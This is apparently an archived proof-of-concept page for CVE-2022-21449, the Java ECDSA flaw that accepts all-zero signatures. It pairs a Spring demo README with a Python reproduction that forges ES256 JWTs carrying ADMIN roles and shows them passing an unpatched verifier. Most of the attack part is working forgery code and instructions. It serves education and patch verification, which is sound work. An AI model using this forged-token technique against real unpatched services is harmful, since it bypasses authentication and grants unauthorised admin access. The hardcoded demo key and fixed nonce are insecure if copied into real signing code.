Related vulnerability
Title:
Oracle Java SE input validation vulnerability
(CVE-2022-21449)
Description: Oracle Java SE is a product of the US company Oracle for developing and deploying Java applications on desktops, servers, embedded devices and real-time environments. Oracle Java SE contains an input validation vulnerability that allows an unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE and Oracle GraalVM Enterprise Edition. Successful exploitation can result in unauthorized creation, deletion or modification of critical data, or of all data accessible to Oracle Java SE and Oracle GraalVM Enterprise Edition. Concretely, the flaw is in the JDK's ECDSA signature verifier: it did not check that the signature values r and s lie in the range 1 to n-1, so an all-zero signature is accepted as valid for any message and any public key.
Introduction
# Demo Project: CVE-2022-21449 Vulnerability
This project demonstrates CVE-2022-21449, a flaw in the ECDSA signature verification of Java 15 through 18 before the April 2022 Critical Patch Update. The verifier did not check that the signature values r and s lie in the range 1 to n-1, so a signature with `r=0` and `s=0` verifies against any message and any public key. The project uses a real ES256-signed JWT and a forged one with an all-zero signature to show the issue on Java 17 without the security patch.
## Features
- **Real JWT Token**: A valid JWT token signed with an EC private key.
- **Fake JWT Token**: A JWT token whose ES256 signature is zeroed (`r=0`, `s=0`); since JWS encodes an ES256 signature as the raw 32-byte `r` followed by the 32-byte `s`, this is 64 zero bytes in base64url.
- **Validation**: Demonstrates how the vulnerability allows the fake token to pass validation.
## Prerequisites
- **Java 17** without the fix for CVE-2022-21449, i.e. 17.0.2 or earlier (the fix shipped in 17.0.3 with the April 2022 CPU; on a patched JDK the fake token is rejected and the demo shows nothing). Java 11 and earlier are not affected because they use the older native ECDSA implementation.
- **Maven** for building the project.
## Project Structure
- `JwtGenerator`: Generates real and fake JWT tokens.
- `JwtUtils`: Validates JWT tokens using a public EC key.
- `SecurityConfig`: Configures Spring Security to demonstrate token-based authentication.
- `ProtectedController`: Provides endpoints to test token-based access control.
## How to Use the `JwtGenerator` Console App
The `JwtGenerator` class is a standalone console application that generates and prints both valid and fake JWT tokens.
### Steps to Run
1. **Build the Project**:
```bash
mvn clean install
```
2. **Run the `JwtGenerator` Class**:
```bash
mvn exec:java -Dexec.mainClass="com.symphony_solutions.demo.util.JwtGenerator"
```
3. **Output**:
The application will print:
- A valid JWT token.
- A fake JWT token with a zeroed signature.
Example:
```
=== Valid JWT ===
eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsInJvbGVzIjpbIkFETUlOIiwiVVNFUiJdLCJpYXQiOjE2NzAwMDAwMDAsImV4cCI6MTY3MDAzNjAwMH0.<signature>
=== Fake JWT with zero signature ===
eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJib2IiLCJyb2xlcyI6WyJBRE1JTiIsIlVTRVIiXSwiaWF0IjoxNjcwMDAwMDAwLCJleHAiOjE2NzAwMzYwMDB9.<zeroed_signature>
```
4. **Use the Tokens**:
- Copy the tokens and use them to test the vulnerability in the application or other tools.
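The verification defect described in the introduction and the token generation done by `JwtGenerator` can both be reproduced without a vulnerable JDK. The following is an added example, not code from this project: a textbook ECDSA verifier over P-256 written twice, once without the range check on `r` and `s` (mirroring the JDK 15-18 bug, including the two details that make `r=0, s=0` pass) and once with it, driven through ES256 JWTs. The private key and signing nonce are constructed fixed values for a reproducible run, not the project's `ec_private_key.pem`.

```python
"""CVE-2022-21449 reproduction: vulnerable vs. patched ECDSA verify, driven by ES256 JWTs.

Added example, not project code. Everything is pure Python so it runs offline.
"""
import base64
import hashlib
import json

# NIST P-256 domain parameters (FIPS 186-4): curve y^2 = x^3 + A*x + B over GF(P), order N
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
INF = None  # the point at infinity (group identity)

# Constructed demo key and nonce, fixed so the run is reproducible. A real signer draws k
# from a CSPRNG or RFC 6979; reusing a fixed k leaks the private key.
PRIVATE_KEY = 0xc9afa9d845ba75166b5c215767b1d6934e50c3db36e89b127b8a622b120f6721
DEMO_K = 0xa6e3c57dd01abe90086538398355dd4c3b17aa873382b0f24d6129493d8aad60


def point_add(p1, p2):
    """Affine point addition, covering doubling and P + (-P) = INF."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point):
    """Double-and-add; k == 0 yields INF, which is what the forged signature triggers."""
    result, addend = INF, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


PUBLIC_KEY = scalar_mult(PRIVATE_KEY, G)


def ecdsa_sign(d, e, k):
    r = scalar_mult(k, G)[0] % N
    s = pow(k, -1, N) * (e + r * d) % N
    return r, s


def verify_vulnerable(q, e, r, s):
    """ECDSA verify as the affected JDK did it: no check that 0 < r, s < N."""
    w = pow(s, N - 2, N)            # Fermat inversion as in the JDK field code: s == 0 gives w == 0
    u1, u2 = e * w % N, r * w % N   # both 0 for the forged signature
    big_r = point_add(scalar_mult(u1, G), scalar_mult(u2, q))
    # The JDK converted its projective result to affine by multiplying X with Z^-1; for the
    # point at infinity Z == 0 and Fermat inversion returns 0, so the x coordinate came out as 0.
    x = 0 if big_r is INF else big_r[0] % N
    return x == r % N               # 0 == 0 when r == 0: the forged signature "verifies"


def verify_patched(q, e, r, s):
    """Same verifier with the range check added in JDK 17.0.3 / 18.0.1."""
    if not (0 < r < N and 0 < s < N):
        return False
    return verify_vulnerable(q, e, r, s)


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_signing_input(claims):
    header = {"alg": "ES256", "typ": "JWT"}
    parts = (json.dumps(obj, separators=(",", ":")).encode() for obj in (header, claims))
    return ".".join(b64url(p) for p in parts)


def sign_jwt(claims, d=PRIVATE_KEY, k=DEMO_K):
    signing_input = jwt_signing_input(claims)
    e = int.from_bytes(hashlib.sha256(signing_input.encode()).digest(), "big")
    r, s = ecdsa_sign(d, e, k)
    # JWS ES256 carries the signature as raw 32-byte r followed by 32-byte s (RFC 7518 3.4)
    return signing_input + "." + b64url(r.to_bytes(32, "big") + s.to_bytes(32, "big"))


def forge_jwt(claims):
    """The project's 'fake JWT': arbitrary claims, signature r = s = 0, i.e. 64 zero bytes."""
    return jwt_signing_input(claims) + "." + b64url(bytes(64))


def verify_jwt(token, q, verify):
    header, payload, sig = token.split(".")
    raw = b64url_decode(sig)
    if len(raw) != 64:
        return False
    r, s = int.from_bytes(raw[:32], "big"), int.from_bytes(raw[32:], "big")
    e = int.from_bytes(hashlib.sha256(f"{header}.{payload}".encode()).digest(), "big")
    return verify(q, e, r, s)


if __name__ == "__main__":
    real = sign_jwt({"sub": "alice", "roles": ["ADMIN", "USER"]})
    fake = forge_jwt({"sub": "bob", "roles": ["ADMIN", "USER"]})
    for name, token in (("real", real), ("forged", fake)):
        print(name, "vulnerable:", verify_jwt(token, PUBLIC_KEY, verify_vulnerable),
              "patched:", verify_jwt(token, PUBLIC_KEY, verify_patched))
```

The forged token's third segment is 86 `A` characters, which is what the `<zeroed_signature>` placeholder above stands for when ES256 is used. The two comments inside `verify_vulnerable` are the whole bug: Fermat inversion silently maps 0 to 0, and the infinity point's x coordinate collapses to 0, so nothing downstream ever sees an error. The one-line range check in `verify_patched` is all that was missing.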
## Demonstrating the Vulnerability
1. **Start the Application**:
```bash
mvn spring-boot:run
```
2. **Access Protected Endpoints**:
- Use the valid token to access `/protected/user` or `/protected/admin`; it was signed with the private key and passes on any JDK.
- Use the fake token, which was never signed with the private key, to show that a vulnerable JDK accepts its zeroed signature and grants the `ADMIN` and `USER` roles claimed in its payload. On a patched JDK the same request is rejected.
3. **Endpoints**:
- `/protected/user`: Requires `USER` or `ADMIN` role.
- `/protected/admin`: Requires `ADMIN` role.
## Important Notes
- This project is for educational purposes only. Do not use it in production environments.
- Upgrade to a JDK that contains the fix (Java 17.0.3, 18.0.1 or later, April 2022 Critical Patch Update). As defence in depth, the JWT layer can also reject any ES256 signature whose `r` or `s` value is zero before handing it to the JDK verifier.
## References
- [CVE-2022-21449 Details](https://nvd.nist.gov/vuln/detail/CVE-2022-21449)
- [Java Security Updates](https://www.oracle.com/security-alerts/)
## License
This project is licensed under the MIT License.
File snapshot
[4.0K] /data/pocs/b9dff573116aa51c5ad4a1939401e81e887bc7a9
├── [ 241] ec_private_key.pem
├── [ 178] ec_public_key.pem
├── [3.0K] pom.xml
├── [2.9K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] symphony_solutions
│ └── [4.0K] demo
│ ├── [4.0K] config
│ │ └── [3.1K] SecurityConfig.java
│ ├── [4.0K] controller
│ │ └── [ 493] ProtectedController.java
│ ├── [ 317] DemoApplication.java
│ └── [4.0K] util
│ ├── [4.1K] JwtGenerator.java
│ └── [1.8K] JwtUtils.java
└── [4.0K] resources
├── [ 168] application.yml
├── [ 241] private_key.pem
└── [ 178] public_key.pem
10 directories, 12 files
Notes
1. Access via the original source is recommended.
2. If the source is gone or unreachable, email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.